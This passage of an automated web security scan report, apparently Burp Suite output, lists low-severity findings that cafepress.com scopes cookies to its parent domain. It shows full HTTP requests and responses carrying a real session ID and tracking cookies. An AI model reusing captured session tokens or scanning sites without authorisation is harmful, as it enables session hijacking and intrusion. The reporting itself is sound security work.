Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 118606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers carrying a domain= attribute in the response). The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601 HTTP/1.1
Host: www.cafepress.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW19
Cteonnt-Length: 95181
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:44:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/; HttpOnly
Set-Cookie: cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
Set-Cookie: cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/
Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
Set-Cookie: pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
Set-Cookie: cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 95181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...

2.5. http://www.cafepress.com/+aprons

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+aprons

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers carrying a domain= attribute in the response). The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+aprons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 60330
Date: Sun, 26 Dec 2010 13:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.6. http://www.cafepress.com/+baby-blanket

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+baby-blanket

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers carrying a domain= attribute in the response). The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+baby-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 58677
Date: Sun, 26 Dec 2010 13:46:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/
Set-Cookie: cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.7. http://www.cafepress.com/+baby-bodysuits

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+baby-bodysuits

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers carrying a domain= attribute in the response). The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+baby-bodysuits HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 59167
Date: Sun, 26 Dec 2010 13:46:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
Set-Cookie: cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59167

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.8. http://www.cafepress.com/+baby-hat

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+baby-hat

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers carrying a domain= attribute in the response). The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+baby-hat HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 58517
Date: Sun, 26 Dec 2010 13:46:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cp_sc=100460; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58517

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.9. http://www.cafepress.com/+bags

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+bags

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers carrying a domain= attribute in the response). The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+bags HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
__utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59533
Date: Sun, 26 Dec 2010 13:46:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/
Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:55 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...

2.10. http://www.cafepress.com/+boxers

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.cafepress.com
Path:   /+boxers

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers carrying a domain= attribute in the response). The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+boxers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; 
